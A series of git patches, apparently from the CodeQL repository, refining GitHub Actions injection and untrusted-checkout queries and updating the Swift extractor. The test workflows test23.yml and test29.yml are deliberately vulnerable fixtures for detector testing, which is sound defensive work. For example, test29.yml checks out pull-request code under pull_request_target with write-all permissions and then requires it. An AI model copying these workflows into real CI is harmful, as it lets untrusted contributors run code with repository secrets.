ql/test/query-tests/Security/CWE-094/.github/workflows/test23.yml diff --git a/ql/lib/codeql/actions/Bash.qll b/ql/lib/codeql/actions/Bash.qll index fda27732828..7f2d4aeef9c 100644 --- a/ql/lib/codeql/actions/Bash.qll +++ b/ql/lib/codeql/actions/Bash.qll @@ -691,11 +691,32 @@ module Bash { // echo "FIELD=${VAR2:-default}" >> $GITHUB_ENV (field, file_write_value) script.getAnAssignment(var2, value2) and containsCmdSubstitution(value2, cmd) and - containsParameterExpansion(expr, var2, _, _) + containsParameterExpansion(expr, var2, _, _) and + not varMatchesRegexTest(script, var2, alphaNumericRegex()) ) or // var reaches the file write directly // echo "FIELD=$(cmd)" >> $GITHUB_ENV (field, file_write_value) containsCmdSubstitution(expr, cmd) } + + /** + * Holds if there test command that checks a variable against a regex + * eg: `[[ $VAR =~ ^[a-zA-Z0-9_]+$ ]]` + */ + bindingset[var, regex] + predicate varMatchesRegexTest(BashShellScript script, string var, string regex) { + exists(string lhs, string rhs | + lhs = script.getACommand().regexpCapture(".*\\[\\[\\s*(.*?)\\s*=~\\s*(.*?)\\s*\\]\\].*", 1) and + containsParameterExpansion(lhs, var, _, _) and + rhs = script.getACommand().regexpCapture(".*\\[\\[\\s*(.*?)\\s*=~\\s*(.*?)\\s*\\]\\].*", 2) and + trimQuotes(rhs).regexpMatch(regex) + ) + } + + /** + * Holds if the given regex is used to match an alphanumeric string + * eg: `^[0-9a-zA-Z]{40}$`, `^[0-9]+$` or `^[a-zA-Z0-9_]+$` + */ + string alphaNumericRegex() { result = "^\\^\\[([09azAZ_-]+)\\](\\+|\\{\\d+\\})\\$$" } } diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test23.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test23.yml new file mode 100644 index 00000000000..184bcd96610 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test23.yml @@ -0,0 +1,64 @@ +on: + workflow_run: + +jobs: + test: + runs-on: ubuntu-22.04 + if: > + (github.event.workflow_run.event == 'pull_request' || + github.event.workflow_run.event == 'pull_request_target') && + github.event.workflow_run.conclusion == 'success' + + steps: + - name: 'Download artifact' + uses: actions/github-script@v3.1.0 + with: + script: | + var artifacts = await github.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: ${{github.event.workflow_run.id }}, + }); + var matchArtifact = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "doc-build-artifact" + })[0]; + var download = await github.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + var fs = require('fs'); + fs.writeFileSync('${{steps.setup-env.outputs.current_work_dir}}/doc-build-artifact.zip', Buffer.from(download.data)); + + - run: | + mkdir build_dir + unzip doc-build-artifact.zip -d build_dir + + - name: Get commit_sha & pr_number + id: github-context + run: | + content_commit_sha=$(cat ./build_dir/commit_sha) + if [[ $content_commit_sha =~ ^[0-9a-zA-Z]{40}$ ]]; then + echo "commit_sha=$content_commit_sha" >> $GITHUB_OUTPUT + rm -rf ./build_dir/commit_sha + else + echo "Encountered an invalid commit_sha" + exit 1 + fi + + content_pr_number=$(cat ./build_dir/pr_number) + if [[ $content_pr_number =~ ^[0-9]+$ ]]; then + echo "pr_number=$content_pr_number" >> $GITHUB_OUTPUT + rm -rf ./build_dir/pr_number + else + echo "Encountered an invalid pr_number" + exit 1 + fi + + - run: | + echo "hub_docs_url=pr_${{ steps.github-context.outputs.pr_number }}" >> $GITHUB_OUTPUT + + - run: | + cd build_dir + doc-builder push --commit_msg "Updated with commit ${{ steps.github-context.outputs.commit_sha }} From a2f162e4822182ab993a7017e1af624dc2aeb8a0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 30 Oct 2024 12:43:44 +0100 Subject: [PATCH 0653/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index a33cecb6fe0..f5f8abdce20 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.81 +version: 0.1.82 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 6d1bc8634ba..c0f849e1f3e 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.81 +version: 0.1.82 groups: [actions, queries] suites: codeql-suites extractor: javascript From d325b8e678a5866335f9d124087210267fba792f Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Wed, 30 Oct 2024 15:56:48 +0100 Subject: [PATCH 0654/1267] Swift: update `load.bzl` and resources --- swift/third_party/load.bzl | 43 ++++++++++--------------- swift/third_party/resources/BUILD.bazel | 27 ++++++++++++++++ swift/third_party/resources/updating.md | 25 ++++++++++++++ 3 files changed, 69 insertions(+), 26 deletions(-) create mode 100644 swift/third_party/resources/updating.md diff --git a/swift/third_party/load.bzl b/swift/third_party/load.bzl index 75eb585b6cc..0e47e6e78b6 100644 --- a/swift/third_party/load.bzl +++ b/swift/third_party/load.bzl @@ -3,14 +3,12 @@ load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive", "http_file" load("@bazel_tools//tools/build_defs/repo:utils.bzl", "maybe") load("//misc/bazel:lfs.bzl", "lfs_archive", "lfs_files") -# these are used to test new artifacts. They must not be merged to main as different from None -_override_resource_dir = { - "macOS": "ad533e614c3565db17186fa93684bd404d1bd66120b563957a44afc997a82b5e", - "Linux": "d6f1abbe9c0662ec2418b9a8c0136b1d8399601f556631a7b0910115cef3a38a", -} -_override_prebuilt = { - "macOS": "8f3c775aa7a62e97046f4dcfbc5b51c317712250396c7a07f7d0f4bd666a59d4", - "Linux": "5658fe92fe60b01b897757495d455c9fe435037a0973cb5b642e04be00a77ed3", +_override = { + # these are used to test new artifacts. Must be empty before merging to main + "swift-prebuilt-macOS.tar.zst": "a016ed60ee1a534439ed4d55100ecf6b9fc739f629be20942345ac5156cb6296", + "swift-prebuilt-Linux.tar.zst": "54240eb2da948207862ea8eb9bcbfe4447016534b9a8e6d8ee1af67db2a3e73f", + "resource-dir-macOS.zip": "fc7ed103d79f9dc61e716a58f221757c33ac2a4358de771d4889e1050f2a5b7a", + "resource-dir-Linux.zip": "e5323f44e72f446e26e7b1fc4920ca9b924e6b5ef8b22e9cb18a0f2f03732913", } _staging_url = "https://github.com/dsp-testing/codeql-swift-artifacts/releases/download/staging-{file}/{file}" @@ -18,12 +16,11 @@ _staging_url = "https://github.com/dsp-testing/codeql-swift-artifacts/releases/d def _load_resource_dir(plat): name = "swift-resource-dir-%s" % plat.lower() file = "resource-dir-%s.zip" % plat - override = _override_resource_dir[plat] - if override: + if file in _override: http_file( name = name, url = _staging_url.format(file = file), - sha256 = override, + sha256 = _override[file], downloaded_file_path = file, ) else: @@ -36,12 +33,11 @@ def _load_prebuilt(plat): name = "swift-prebuilt-%s" % plat.lower() file = "swift-prebuilt-%s.tar.zst" % plat build = _build % "swift-llvm-support" - override = _override_prebuilt[plat] - if override: + if file in _override: http_archive( name = name, url = _staging_url.format(file = file), - sha256 = override, + sha256 = _override[file], build_file = build, ) else: @@ -93,18 +89,13 @@ def load_dependencies(module_ctx): swift_deps = module_extension(load_dependencies) def test_no_override(): - test_body = ["#!/bin/bash", "", "RET=0"] - for name, definition in ( - ("_override_prebuilt", _override_prebuilt), - ("_override_resource_dir", _override_resource_dir), - ): - for plat in ("macOS", "Linux"): - if definition[plat]: - test_body += [ - 'echo %s[\\"%s\\"] overridden in swift/third/party/load.bzl' % (name, plat), - "RET=1", - ] - test_body += ["", "exit $RET"] + test_body = ["#!/bin/bash", ""] + test_body += [ + 'echo \\"%s\\" overridden in swift/third/party/load.bzl' % key + for key in _override + ] + if _override: + test_body.append("exit 1") write_file( name = "test-no-override-gen", out = "test-no-override.sh", diff --git a/swift/third_party/resources/BUILD.bazel b/swift/third_party/resources/BUILD.bazel index 3bf263911cd..8c26788e411 100644 --- a/swift/third_party/resources/BUILD.bazel +++ b/swift/third_party/resources/BUILD.bazel @@ -19,3 +19,30 @@ alias( }), visibility = ["//visibility:public"], ) + +[ + sh_binary( + name = "update-%s-%s" % (what, os), + srcs = ["update.sh"], + args = [ + "$(rlocationpath %s)" % what, + "$(rlocationpath %s)" % target, + ], + data = [ + what, + target, + ], + deps = ["//misc/bazel:sh_runfiles"], + ) + for os in _oses + for what, target in ( + ( + "prebuilt", + "swift-prebuilt-%s.tar.zst" % os, + ), + ( + "dir", + "resource-dir-%s.zip" % os, + ), + ) +] diff --git a/swift/third_party/resources/updating.md b/swift/third_party/resources/updating.md new file mode 100644 index 00000000000..9855eeecd9c --- /dev/null +++ b/swift/third_party/resources/updating.md @@ -0,0 +1,25 @@ +These files can only be updated having access for the internal repository at the moment. + +In order to perform a Swift update: + +1. Dispatch the https://github.com/github/semmle-code/actions/workflows/__swift-prebuild.yml with the appropriate swift + tag. +2. Dispatch the https://github.com/github/semmle-code/actions/workflows/__swift-prepare-resource-dir.yml with the + appropriate swift tag. +3. Once the jobs finish, staged artifacts are available + at https://github.com/dsp-testing/codeql-swift-artifacts/releases. Copy and paste the sha256 within the `_override` + definition in [`load.bzl`](../load.bzl). +4. Compile and run test locally. Adjust the code if needed. New AST entities have to be dealt with in [ + `SwiftTagTraits.h`](../../extractor/infra/SwiftTagTraits.h). +5. Open a draft PR with the overridden artifacts. Make sure CI passes, go back to 4. otherwise. +6. Run DCA, got back to 4. in case of problems. +7. Once you are happy, do + ```bash + bazel run //swift/third_party/resources:update-dir-macos + bazel run //swift/third_party/resources:update-dir-linux + bazel run //swift/third_party/resources:update-prebuilt-macos + bazel run //swift/third_party/resources:update-prebuilt-linux + ``` + (or whatever you have overridden). This will pull the staged archives in the repository for git LFS. +8. Clear `_override` in [`load.bzl`](../load.bzl). +9. Push and your PR will be ready for `main`. From df8184e0dc4840cdac951df21f097dbcea0fce05 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Wed, 30 Oct 2024 15:59:03 +0100 Subject: [PATCH 0655/1267] Swift: fix `check-no-override` job --- .github/workflows/swift.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/swift.yml b/.github/workflows/swift.yml index 269bccdf28b..720c9eb4072 100644 --- a/.github/workflows/swift.yml +++ b/.github/workflows/swift.yml @@ -113,5 +113,6 @@ jobs: if : ${{ github.event_name == 'pull_request' }} runs-on: ubuntu-latest steps: + - uses: actions/checkout@v4 - shell: bash run: bazel test //swift/... --test_tag_filters=override --test_output=errors From 5e6228cf7c01b613eda4c48e8a4e1d8173979fa9 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Wed, 30 Oct 2024 16:11:08 +0100 Subject: [PATCH 0656/1267] Swift: fix --- .github/workflows/swift.yml | 2 +- swift/third_party/load.bzl | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/.github/workflows/swift.yml b/.github/workflows/swift.yml index 720c9eb4072..6b9981a9b53 100644 --- a/.github/workflows/swift.yml +++ b/.github/workflows/swift.yml @@ -110,7 +110,7 @@ jobs: - uses: ./.github/actions/fetch-codeql - uses: ./swift/actions/database-upgrade-scripts check-no-override: - if : ${{ github.event_name == 'pull_request' }} + if : github.event_name == 'pull_request' runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 diff --git a/swift/third_party/load.bzl b/swift/third_party/load.bzl index 0e47e6e78b6..0df011791a6 100644 --- a/swift/third_party/load.bzl +++ b/swift/third_party/load.bzl @@ -7,8 +7,8 @@ _override = { # these are used to test new artifacts. Must be empty before merging to main "swift-prebuilt-macOS.tar.zst": "a016ed60ee1a534439ed4d55100ecf6b9fc739f629be20942345ac5156cb6296", "swift-prebuilt-Linux.tar.zst": "54240eb2da948207862ea8eb9bcbfe4447016534b9a8e6d8ee1af67db2a3e73f", - "resource-dir-macOS.zip": "fc7ed103d79f9dc61e716a58f221757c33ac2a4358de771d4889e1050f2a5b7a", - "resource-dir-Linux.zip": "e5323f44e72f446e26e7b1fc4920ca9b924e6b5ef8b22e9cb18a0f2f03732913", + "resource-dir-macOS.zip": "286e4403aa0a56641c2789e82036481535e336484f2c760bec0f42e3afe5dd87", + "resource-dir-Linux.zip": "16a1760f152395377a580a994885e0877338279125834463a6a38f4006ad61ca", } _staging_url = "https://github.com/dsp-testing/codeql-swift-artifacts/releases/download/staging-{file}/{file}" From 01417025f276b5e4d107bd3b616fb2bbeb19cd8a Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Wed, 30 Oct 2024 16:20:27 +0100 Subject: [PATCH 0657/1267] Swift: use `ubuntu-latest` --- .github/workflows/swift.yml | 4 ++-- swift/README.md | 5 +++++ 2 files changed, 7 insertions(+), 2 deletions(-) diff --git a/.github/workflows/swift.yml b/.github/workflows/swift.yml index 6b9981a9b53..0d2a9518677 100644 --- a/.github/workflows/swift.yml +++ b/.github/workflows/swift.yml @@ -50,14 +50,14 @@ jobs: - uses: ./swift/actions/build-and-test build-and-test-linux: if: github.repository_owner == 'github' - runs-on: ubuntu-latest-xl + runs-on: ubuntu-24.04 steps: - uses: actions/checkout@v4 - uses: ./swift/actions/build-and-test qltests-linux: if: github.repository_owner == 'github' needs: build-and-test-linux - runs-on: ubuntu-latest-xl + runs-on: ubuntu-24.04 steps: - uses: actions/checkout@v4 - uses: ./swift/actions/run-ql-tests diff --git a/swift/README.md b/swift/README.md index a39c0ea5578..df2c8cae137 100644 --- a/swift/README.md +++ b/swift/README.md @@ -113,3 +113,8 @@ In particular for breakpoints to work you might need to setup the following remo ### Thread safety The extractor is single-threaded, and there was no effort to make anything in it thread-safe. + +### Updating the swift compiler version + +This can only be done with access to the internal repository at the moment. Some (incomplete) instructions are +found [here](third_party/resources/updating.md). From 3877eb8bc9592b866a3f1a94ba143b9024a91225 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Wed, 30 Oct 2024 17:08:20 +0100 Subject: [PATCH 0658/1267] Swift: tentatively fix type mangling --- swift/extractor/mangler/SwiftMangler.cpp | 36 ++++++++++++++++-------- swift/third_party/load.bzl | 2 +- 2 files changed, 26 insertions(+), 12 deletions(-) diff --git a/swift/extractor/mangler/SwiftMangler.cpp b/swift/extractor/mangler/SwiftMangler.cpp index bb8f63c232e..3743ab53dca 100644 --- a/swift/extractor/mangler/SwiftMangler.cpp +++ b/swift/extractor/mangler/SwiftMangler.cpp @@ -197,19 +197,30 @@ SwiftMangledName SwiftMangler::visitAnyFunctionType(const swift::AnyFunctionType auto ret = initMangled(type); for (const auto& param : type->getParams()) { ret << fetch(param.getPlainType()); - if (param.isInOut()) { - ret << "_inout"; - } - if (param.isOwned()) { - ret << "_owned"; - } - if (param.isShared()) { - ret << "_shared"; - } - if (param.isIsolated()) { + auto flags = param.getParameterFlags(); + ret << "_" << getNameForParamSpecifier(flags.getOwnershipSpecifier()); + if (flags.isIsolated()) { ret << "_isolated"; } - if (param.isVariadic()) { + if (flags.isAutoClosure()) { + ret << "_autoclosure"; + } + if (flags.isNonEphemeral()) { + ret << "_nonephermeral"; + } + if (flags.isIsolated()) { + ret << "_isolated"; + } + if (flags.isSending()) { + ret << "_sending"; + } + if (flags.isCompileTimeConst()) { + ret << "_compiletimeconst"; + } + if (flags.isNoDerivative()) { + ret << "_noderivative"; + } + if (flags.isVariadic()) { ret << "..."; } } @@ -219,6 +230,9 @@ SwiftMangledName SwiftMangler::visitAnyFunctionType(const swift::AnyFunctionType } if (type->isThrowing()) { ret << "_throws"; + if (type->hasThrownError()) { + ret << "(" << fetch(type->getThrownError()) << ")"; + } } if (type->isSendable()) { ret << "_sendable"; diff --git a/swift/third_party/load.bzl b/swift/third_party/load.bzl index 0df011791a6..312e7e84221 100644 --- a/swift/third_party/load.bzl +++ b/swift/third_party/load.bzl @@ -6,7 +6,7 @@ load("//misc/bazel:lfs.bzl", "lfs_archive", "lfs_files") _override = { # these are used to test new artifacts. Must be empty before merging to main "swift-prebuilt-macOS.tar.zst": "a016ed60ee1a534439ed4d55100ecf6b9fc739f629be20942345ac5156cb6296", - "swift-prebuilt-Linux.tar.zst": "54240eb2da948207862ea8eb9bcbfe4447016534b9a8e6d8ee1af67db2a3e73f", + "swift-prebuilt-Linux.tar.zst": "c45976d50670964132cef1dcf98bccd3fff809d33b2207a85cf3cfd07ec84528", "resource-dir-macOS.zip": "286e4403aa0a56641c2789e82036481535e336484f2c760bec0f42e3afe5dd87", "resource-dir-Linux.zip": "16a1760f152395377a580a994885e0877338279125834463a6a38f4006ad61ca", } From 66e43c40066f23bb1313a30477ce7c9f8b681ab4 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Wed, 30 Oct 2024 17:16:35 +0100 Subject: [PATCH 0659/1267] Swift: use ubuntu 22.04 --- .github/workflows/swift.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/swift.yml b/.github/workflows/swift.yml index 0d2a9518677..15cb5413536 100644 --- a/.github/workflows/swift.yml +++ b/.github/workflows/swift.yml @@ -50,14 +50,14 @@ jobs: - uses: ./swift/actions/build-and-test build-and-test-linux: if: github.repository_owner == 'github' - runs-on: ubuntu-24.04 + runs-on: ubuntu-22.04 steps: - uses: actions/checkout@v4 - uses: ./swift/actions/build-and-test qltests-linux: if: github.repository_owner == 'github' needs: build-and-test-linux - runs-on: ubuntu-24.04 + runs-on: ubuntu-22.04 steps: - uses: actions/checkout@v4 - uses: ./swift/actions/run-ql-tests From 0157bf3297d1d2173efe9036ba6606273813d6e8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 30 Oct 2024 22:12:17 +0100 Subject: [PATCH 0660/1267] fix: improve JS require/import poisonable step to account for cwd --- .../actions/security/PoisonableSteps.qll | 5 +++-- .../CWE-829/.github/workflows/test29.yml | 21 +++++++++++++++++++ .../UntrustedCheckoutCritical.expected | 2 ++ 3 files changed, 26 insertions(+), 2 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index d446c446641..1f3bc66bd77 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -21,9 +21,10 @@ class JavascriptImportUsesStep extends PoisonableStep, UsesStep { this.getCallee() = "actions/github-script" and script = this.getArgument("script") and line = script.splitAt("\n").trim() and + // const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs') // const script = require('${{ github.workspace }}/scripts/test.js'); - // await script({ github, context, core }); - line.regexpMatch(".*(import|require)\\b.*github.workspace\\b.*") + // const script = require('./scripts'); + line.regexpMatch(".*(import|require)\\(('|\")(\\./|.*github.workspace).*") ) } } diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml new file mode 100644 index 00000000000..cc7f71a7b3e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml @@ -0,0 +1,21 @@ +on: pull_request_target + +jobs: + test: + permissions: write-all + runs-on: ubuntu-latest + steps: + - name: Checkout repository + uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + fetch-depth: 0 + + - uses: actions/github-script@v5 + with: + github-token: ${{secrets.GITHUB_TOKEN}} + script: | + const { + foo + } = require('./foo'); + diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 35d61dac5fa..85c2529c54c 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -285,6 +285,7 @@ edges | .github/workflows/test25.yml:32:9:35:6 | Run Step | .github/workflows/test25.yml:35:9:42:53 | Run Step | | .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:21:9:22:16 | Run Step | | .github/workflows/test28.yml:17:9:20:6 | Uses Step | .github/workflows/test28.yml:20:9:20:22 | Run Step | +| .github/workflows/test29.yml:8:7:14:4 | Uses Step | .github/workflows/test29.yml:14:7:21:11 | Uses Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | @@ -346,6 +347,7 @@ edges | .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test11.yml:5:3:5:15 | issue_comment | issue_comment | | .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test17.yml:3:5:3:16 | workflow_run | workflow_run | | .github/workflows/test27.yml:21:9:22:16 | Run Step | .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:21:9:22:16 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test26.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test29.yml:14:7:21:11 | Uses Step | .github/workflows/test29.yml:8:7:14:4 | Uses Step | .github/workflows/test29.yml:14:7:21:11 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test29.yml:1:5:1:23 | pull_request_target | pull_request_target | | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | workflow_run | | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | From 7f3745cfcdefa1bc739e80d09e858ba4f266e86e Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Thu, 31 Oct 2024 06:22:06 +0100 Subject: [PATCH 0661/1267] Swift: fix `@isolated(any)` DB inconsistencies --- swift/extractor/mangler/SwiftMangler.cpp | 3 +++ swift/third_party/load.bzl | 2 +- 2 files changed, 4 insertions(+), 1 deletion(-) diff --git a/swift/extractor/mangler/SwiftMangler.cpp b/swift/extractor/mangler/SwiftMangler.cpp index 3743ab53dca..04e04fd6fbc 100644 --- a/swift/extractor/mangler/SwiftMangler.cpp +++ b/swift/extractor/mangler/SwiftMangler.cpp @@ -243,6 +243,9 @@ SwiftMangledName SwiftMangler::visitAnyFunctionType(const swift::AnyFunctionType if (type->hasGlobalActor()) { ret << "_actor" << fetch(type->getGlobalActor()); } + if (type->getIsolation().isErased()) { + ret << "_isolated"; + } // TODO: see if this needs to be used in identifying types, if not it needs to be removed from // type printing in the Swift compiler code assert(type->hasExtInfo() && "type must have ext info"); diff --git a/swift/third_party/load.bzl b/swift/third_party/load.bzl index 312e7e84221..dd8470a023f 100644 --- a/swift/third_party/load.bzl +++ b/swift/third_party/load.bzl @@ -5,7 +5,7 @@ load("//misc/bazel:lfs.bzl", "lfs_archive", "lfs_files") _override = { # these are used to test new artifacts. Must be empty before merging to main - "swift-prebuilt-macOS.tar.zst": "a016ed60ee1a534439ed4d55100ecf6b9fc739f629be20942345ac5156cb6296", + "swift-prebuilt-macOS.tar.zst": "4679ad4086ac6894e2f8a6bd71c5033941c894844809bf988dacb8af0c384416", "swift-prebuilt-Linux.tar.zst": "c45976d50670964132cef1dcf98bccd3fff809d33b2207a85cf3cfd07ec84528", "resource-dir-macOS.zip": "286e4403aa0a56641c2789e82036481535e336484f2c760bec0f42e3afe5dd87", "resource-dir-Linux.zip": "16a1760f152395377a580a994885e0877338279125834463a6a38f4006ad61ca", From 34b8b43843fb58480fa58834abe2e94649467d9d Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Thu, 31 Oct 2024 06:41:46 +0100 Subject: [PATCH 0662/1267] Swift: use `-typecheck` in QL tests --- swift/tools/qltest.sh | 2 +- swift/tools/test/qltest/utils.py | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/swift/tools/qltest.sh b/swift/tools/qltest.sh index ba5fb779d28..00657d593b8 100755 --- a/swift/tools/qltest.sh +++ b/swift/tools/qltest.sh @@ -9,7 +9,7 @@ RESOURCE_DIR="$CODEQL_EXTRACTOR_SWIFT_ROOT/resource-dir/$CODEQL_PLATFORM" export CODEQL_EXTRACTOR_SWIFT_LOG_LEVELS=${CODEQL_EXTRACTOR_SWIFT_LOG_LEVELS:-out:text:no_logs,out:console:info} for src in *.swift; do env=() - opts=(-resource-dir "$RESOURCE_DIR" -c -primary-file "$src") + opts=(-resource-dir "$RESOURCE_DIR" -typecheck -primary-file "$src") opts+=($(sed -n '1 s=//codeql-extractor-options:==p' $src)) expected_status=$(sed -n 's=//codeql-extractor-expected-status:[[:space:]]*==p' $src) expected_status=${expected_status:-0} diff --git a/swift/tools/test/qltest/utils.py b/swift/tools/test/qltest/utils.py index fc2d6582a82..9ed49c04153 100644 --- a/swift/tools/test/qltest/utils.py +++ b/swift/tools/test/qltest/utils.py @@ -60,7 +60,7 @@ def assert_extractor_executed_with(*flags): for actual, expected in itertools.zip_longest(execution, flags): if actual: actual = actual.strip() - expected_prefix = f"-resource-dir {swift_root}/resource-dir/{platform} -c -primary-file " + expected_prefix = f"-resource-dir {swift_root}/resource-dir/{platform} -typecheck -primary-file " assert actual.startswith(expected_prefix), f"correct options not found in\n{actual}" actual = actual[len(expected_prefix):] assert actual, f"\nnot encountered: {expected}" From 3aa71230325f48e04ada0fb5a178c159832dbaa7 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Thu, 31 Oct 2024 09:26:03 +0100 Subject: [PATCH 0663/1267] Swift: restrict `UnresolvedAstNodes` to known locations --- swift/ql/consistency-queries/UnresolvedAstNodes.ql | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/swift/ql/consistency-queries/UnresolvedAstNodes.ql b/swift/ql/consistency-queries/UnresolvedAstNodes.ql index d2369ab9436..b77e526c573 100644 --- a/swift/ql/consistency-queries/UnresolvedAstNodes.ql +++ b/swift/ql/consistency-queries/UnresolvedAstNodes.ql @@ -1,5 +1,8 @@ import swift -from AstNode n -where n.getAPrimaryQlClass().matches("Unresolved%") -select n +from AstNode n, string cls +where + cls = n.getAPrimaryQlClass() and + cls.matches("Unresolved%") and + not n.getLocation() instanceof UnknownLocation +select n, cls From ce4273d461d852032e29a528564e56f819a11840 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Thu, 31 Oct 2024 09:52:08 +0100 Subject: [PATCH 0664/1267] Revert "Swift: use `-typecheck` in QL tests" This reverts commit 34b8b43843fb58480fa58834abe2e94649467d9d. --- swift/tools/qltest.sh | 2 +- swift/tools/test/qltest/utils.py | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/swift/tools/qltest.sh b/swift/tools/qltest.sh index 00657d593b8..ba5fb779d28 100755 --- a/swift/tools/qltest.sh +++ b/swift/tools/qltest.sh @@ -9,7 +9,7 @@ RESOURCE_DIR="$CODEQL_EXTRACTOR_SWIFT_ROOT/resource-dir/$CODEQL_PLATFORM" export CODEQL_EXTRACTOR_SWIFT_LOG_LEVELS=${CODEQL_EXTRACTOR_SWIFT_LOG_LEVELS:-out:text:no_logs,out:console:info} for src in *.swift; do env=() - opts=(-resource-dir "$RESOURCE_DIR" -typecheck -primary-file "$src") + opts=(-resource-dir "$RESOURCE_DIR" -c -primary-file "$src") opts+=($(sed -n '1 s=//codeql-extractor-options:==p' $src)) expected_status=$(sed -n 's=//codeql-extractor-expected-status:[[:space:]]*==p' $src) expected_status=${expected_status:-0} diff --git a/swift/tools/test/qltest/utils.py b/swift/tools/test/qltest/utils.py index 9ed49c04153..fc2d6582a82 100644 --- a/swift/tools/test/qltest/utils.py +++ b/swift/tools/test/qltest/utils.py @@ -60,7 +60,7 @@ def assert_extractor_executed_with(*flags): for actual, expected in itertools.zip_longest(execution, flags): if actual: actual = actual.strip() - expected_prefix = f"-resource-dir {swift_root}/resource-dir/{platform} -typecheck -primary-file " + expected_prefix = f"-resource-dir {swift_root}/resource-dir/{platform} -c -primary-file " assert actual.startswith(expected_prefix), f"correct options not found in\n{actual}" actual = actual[len(expected_prefix):] assert actual, f"\nnot encountered: {expected}" From 